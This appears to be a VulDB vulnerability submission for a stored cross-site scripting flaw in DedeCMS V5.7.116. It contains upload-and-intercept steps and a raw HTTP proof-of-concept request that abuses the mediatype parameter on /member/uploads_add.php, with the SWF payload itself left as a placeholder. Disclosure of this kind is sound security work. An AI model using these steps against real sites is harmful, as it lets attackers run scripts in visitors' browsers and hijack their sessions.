Title | DedeCMS V5.7.116 Cross Site Scripting |
---|
Description | Summary
DedeCMS V5.7.116 is affected by a stored cross-site scripting vulnerability that can be exploited by an attacker to upload a malicious SWF file, which can lead to XSS attacks. This vulnerability exists due to insufficient input validation and sanitization of user-supplied data.
Details
Log in and go to http://target-ip/member/uploads_add.php to upload the xss payload in .SWF file.
image
Intercept the upload request and change the mediatype parameter in the request to 2.
image
Observe the response, which should include a URL similar to /uploads/userup/1/XXXX.swf.
image
Access the provided URL to trigger the XSS vulnerability.
image
POC
POST /member/uploads_add.php HTTP/1.1
Host: target-ip
Content-Length: 963
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfRghPB9M7esxjc3h
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="f"
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="mediatype"
2
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="keyword"
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="dopost"
save
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="title"
123
------WebKitFormBoundaryfRghPB9M7esxjc3h
Content-Disposition: form-data; name="addonfile"; filename="xsstest.swf"
Content-Type: application/x-shockwave-flash
[xss payload in swf]
------WebKitFormBoundaryfRghPB9M7esxjc3h-- |
---|
Source | ⚠️ https://github.com/Hebing123/cve/issues/77 |
---|
User | jiashenghe (UID 39445) |
---|
Submission | 11/27/2024 09:16 AM (3 months ago) |
---|
Moderation | 12/04/2024 05:31 PM (7 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 286903 [DedeCMS 5.7.116 SWF File /member/uploads_add.php mediatype cross site scripting] |
---|
Points | 20 |
---|